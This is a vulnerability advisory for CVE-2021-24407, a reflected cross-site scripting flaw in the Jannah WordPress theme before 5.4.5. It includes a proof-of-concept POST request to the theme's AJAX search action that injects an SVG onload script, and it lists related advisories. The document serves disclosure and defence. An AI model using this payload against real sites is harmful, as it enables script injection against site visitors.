Jannah < 5.4.5 – Reflected Cross-Site Scripting (XSS) | CVE 2021-24407 | Theme Vulnerabilities

Description

The theme did not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action, leading to a Reflected Cross-site Scripting (XSS) vulnerability.

Proof of Concept

POST /demo/wp-admin/admin-ajax.php HTTP/1.1
Host: jannah.tielabs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 66
Connection: close

action=tie_ajax_search&query[]=<svg+onload=alert(document.domain)>

Affects Themes

Fixed in 5.4.5

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Truoc Phan from Techlab Corporation

Submitter

Truoc Phan

Submitter website

https://www.facebook.com/292706121240740

Submitter twitter

Verified

Yes

WPVDB ID

fba9f010-1202-4eea-a6f5-78865c084153

Timeline

Publicly Published

2021-06-14 (about 4 years ago)

Added

2021-06-14 (about 4 years ago)

Last Updated

2021-06-25 (about 4 years ago)

Other

Published

Title

Published

2025-01-16

Title

WP OpenSearch <= 1.0 - Reflected Cross-Site Scripting

Published

2022-08-17

Title

WP STAGING < 2.9.18 - Admin+ Stored Cross-Site Scripting

Published

2024-02-12

Title

Booster for WooCommerce < 7.1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2014-08-01

Title

WP Cron DashBoard <= 1.1.5 - Reflected Cross-Site Scripting (XSS)

Published

2025-07-10

Title

WPC Smart Compare for WooCommerce < 6.4.7 - Authenticated (Contributor+) Stored Cross-Site Scripting